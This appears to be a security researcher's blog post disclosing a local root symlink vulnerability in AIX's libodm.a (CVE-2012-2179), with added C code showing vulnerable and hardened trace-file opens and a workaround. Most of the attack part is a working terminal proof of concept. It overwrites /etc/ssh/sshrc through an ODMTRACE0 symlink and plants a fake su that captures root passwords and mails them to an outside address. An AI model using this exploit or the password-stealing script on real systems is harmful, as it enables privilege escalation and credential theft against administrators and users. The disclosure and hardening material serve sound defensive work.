This is a new local attack for at least AIX 6.1 / 7.1, or at least there has been enough time for anyone serious about security to patch their systems (IBM released its advisory on 2012-06-22; today is 2012-07-12). It is a typical arbitrary-file-overwrite symlink vulnerability, caused by a bug in libodm.a, that gives local root. libodm.a (here used by the SUID lsvg) calls getenv("ODMERR"), an undocumented environment variable; if it is set, debug code is triggered that dumps the debug log messages libodm.a generates at runtime to a file with a fixed name, ODMTRACE0 (or ODMTRACE1, etc.), in the current working directory (it seems to use getcwd()). Because the file is created with the privileges of the SUID process and the name is opened without any symlink check, an unprivileged user who plants ODMTRACE0 -> <target> in a directory they control gets an arbitrary file created or overwritten as root, with permissions governed by the attacker's own umask. Proof:
guest@XXX:# oslevel -s
7100-00-03-1115
guest@XXX:# export ODMERR=1
guest@XXX:# ln -s /etc/ssh/sshrc ODMTRACE0
guest@XXX:# ls -l
total 0
lrwxrwxrwx    1 install  staff            14 Dec 22 05:42 ODMTRACE0 -> /etc/ssh/sshrc
guest@XXX:# umask 0000
guest@XXX:# lsvg
rootvg
appvg
guest@XXX:# ls -l
total 0
lrwxrwxrwx    1 install  staff            14 Dec 22 05:42 ODMTRACE0 -> /etc/ssh/sshrc
guest@XXX:# head -3 ODMTRACE0
__odm_initfini_init: Start
__odm_initfini_init: End
odm_set_path: Start
guest@XXX:# ls -l /etc/ssh/sshrc
-rw-rw-rw-    1 root     staff          7332 Dec 22 05:42 /etc/ssh/sshrc
guest@XXX:#
guest@XXX:# vi /etc/ssh/sshrc
# a lot of typing
guest@XXX:# cat /etc/ssh/sshrc
#!/bin/sh
# proof of concept for lsvg(1) AIX61/71 0-day exploit, 22/12/2011, vnull
#
# /etc/environment usually sets PATH from scratch so we have to
# cheat via ~/.profile which is read by user's shell at later stage
#
mkdir /tmp/$$
cat > /tmp/$$/su << EOF
#!/bin/bash
# this would be a su backdoor sending email or transmitting the pw over dns...
echo -e "root's Password: \c"
stty -echo
read PW
stty echo
echo
#echo your PW is \$PW
echo \$USER \$HOSTNAME \$PW | mail -s cookie firstname.lastname@example.org > /dev/null 2>&1
echo '[compat]: 3004-300 You entered an invalid login name or password.'
echo
echo '3004-501 Cannot su to "root" : Authentication is denied.'
rm -f /tmp/$$/su
exit 0
EOF
chmod 755 /tmp/$$/su
cat >> ~/.profile << EOF
export PATH=/tmp/$$:$PATH
EOF
guest@XXX:#
How does it work? Once the attack above has been performed, any user who then logs in remotely over ssh (root or an ordinary user) has the contents of /etc/ssh/sshrc executed by sshd with that user's privileges. The sshrc planted here prepends an attacker-owned directory to PATH via ~/.profile, so that user's later "su" invocations are hijacked by the fake su, which captures the typed password, prints AIX's usual su failure messages so the victim just thinks they mistyped, and removes itself. The same trick can be adapted to capture "sudo" passwords too.
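The underlying library bug, as an added example that is not code from the original post nor from IBM's libodm.a: a minimal model of the ODMERR trace-file open next to a hardened version, with a constructed stand-in for /etc/ssh/sshrc so it runs offline. All function names, the temporary directory under /tmp and the stand-in contents are assumptions of this example. It goes slightly beyond the post in that it shows both of the fixes a set-id program needs (ignore caller-controlled debug environment when real and effective ids differ, and create the trace file with O_EXCL and an explicit mode), and demonstrates that ordinary debug use still works after hardening.

```c
/* Added example: vulnerable vs hardened debug-trace open in a privileged
 * program. Not libodm.a source; names and paths are hypothetical. */
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Constructed stand-in for the real target file's contents. */
static const char kOriginal[] = "# constructed stand-in for /etc/ssh/sshrc\n";

/* Vulnerable shape (the behaviour the post describes): an environment
 * variable alone enables tracing, and the trace file is opened by name
 * in the current directory, so a planted symlink is followed and the
 * target is created/truncated with the caller's umask applied to 0666. */
static int trace_open_vulnerable(const char *path)
{
    if (getenv("ODMERR") == NULL)
        return -1;
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Hardened shape. */
static int trace_open_hardened(const char *path)
{
    if (getenv("ODMERR") == NULL)
        return -1;
    /* A set-uid/set-gid process must not take debug instructions from the
     * environment its unprivileged caller controls. */
    if (getuid() != geteuid() || getgid() != getegid())
        return -1;
    /* O_CREAT|O_EXCL fails with EEXIST on any existing path, a symlink
     * included, whatever it points at; 0600 keeps the umask from widening it. */
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

/* Attacker's layout: <dir>/target holds kOriginal, <dir>/ODMTRACE0 -> target. */
static int setup_layout(char *dir, size_t dn, char *target, size_t tn, char *lnk, size_t ln)
{
    snprintf(dir, dn, "/tmp/odmdemo.XXXXXX");   /* assumed writable */
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(target, tn, "%s/target", dir);
    snprintf(lnk, ln, "%s/ODMTRACE0", dir);
    int fd = open(target, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, kOriginal, sizeof kOriginal - 1);
    close(fd);
    if (n != (ssize_t)(sizeof kOriginal - 1) || symlink(target, lnk) != 0)
        return -1;
    setenv("ODMERR", "1", 1);                   /* the attacker's "export ODMERR=1" */
    return 0;
}

static long file_size(const char *path)
{
    struct stat st;
    return stat(path, &st) == 0 ? (long)st.st_size : -1;
}

static void cleanup(const char *dir, const char *target, const char *lnk)
{
    unlink(lnk);
    unlink(target);
    rmdir(dir);
}

/* 1 when the vulnerable open followed the symlink and truncated the target. */
int demo_vulnerable_truncates_target(void)
{
    char dir[64], target[96], lnk[96];
    if (setup_layout(dir, sizeof dir, target, sizeof target, lnk, sizeof lnk) != 0)
        return -1;
    int fd = trace_open_vulnerable(lnk);
    long after = file_size(target);
    if (fd >= 0)
        close(fd);
    cleanup(dir, target, lnk);
    return fd >= 0 && after == 0;
}

/* errno of the refused hardened open (EEXIST expected); 0 if it wrongly
 * succeeded or the target's contents changed. */
int demo_hardened_refuses_symlink(void)
{
    char dir[64], target[96], lnk[96];
    if (setup_layout(dir, sizeof dir, target, sizeof target, lnk, sizeof lnk) != 0)
        return -1;
    int fd = trace_open_hardened(lnk);
    int err = fd < 0 ? errno : 0;
    long after = file_size(target);
    if (fd >= 0)
        close(fd);
    cleanup(dir, target, lnk);
    return (fd < 0 && after == (long)(sizeof kOriginal - 1)) ? err : 0;
}

/* 1 when the hardened open still creates a fresh trace file, mode 0600,
 * even under the PoC's umask 0000 (legitimate debugging keeps working). */
int demo_hardened_creates_fresh_file(void)
{
    char dir[64], path[96];
    snprintf(dir, sizeof dir, "/tmp/odmdemo.XXXXXX");
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(path, sizeof path, "%s/ODMTRACE0", dir);
    setenv("ODMERR", "1", 1);
    umask(0);
    int fd = trace_open_hardened(path);
    struct stat st;
    int ok = fd >= 0 && fstat(fd, &st) == 0 && (st.st_mode & 07777) == 0600;
    if (fd >= 0)
        close(fd);
    unlink(path);
    rmdir(dir);
    return ok;
}

int main(void)
{
    printf("vulnerable open truncated target via symlink: %d\n", demo_vulnerable_truncates_target());
    printf("hardened open refused symlink with errno %d (EEXIST=%d)\n", demo_hardened_refuses_symlink(), EEXIST);
    printf("hardened open creates fresh 0600 trace file: %d\n", demo_hardened_creates_fresh_file());
    return 0;
}
```

O_EXCL alone defeats the symlink plant, but note the trade-off: a trace file can then never be reused across runs, which is acceptable for debug output and is exactly why a privileged program should write such output under a directory only it can write to, not into whatever cwd its caller chose.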
Potential workaround: drop the SUID bit from every binary linked against libodm.a. Yes, I find that kind of hard, because it means removing SUID even from lsvg, which may break a lot of IBM and third-party software, especially monitoring agents that use commands such as lsvg.
Fixed; tracked as CVE-2012-2179. More info here: http://aix.software.ibm.com/aix/efixes/security/libodm_advisory.asc
Still, IBM AIX does not come with proper hardening against /tmp races, as mentioned in the previous blog entry about CVE-2011-1384. Timeline: almost 180 days for IBM to fix.
BTW: this proof of concept could easily be adapted to give instant root (as you can create any file that does not exist), but I'm not going to disclose weaponized versions.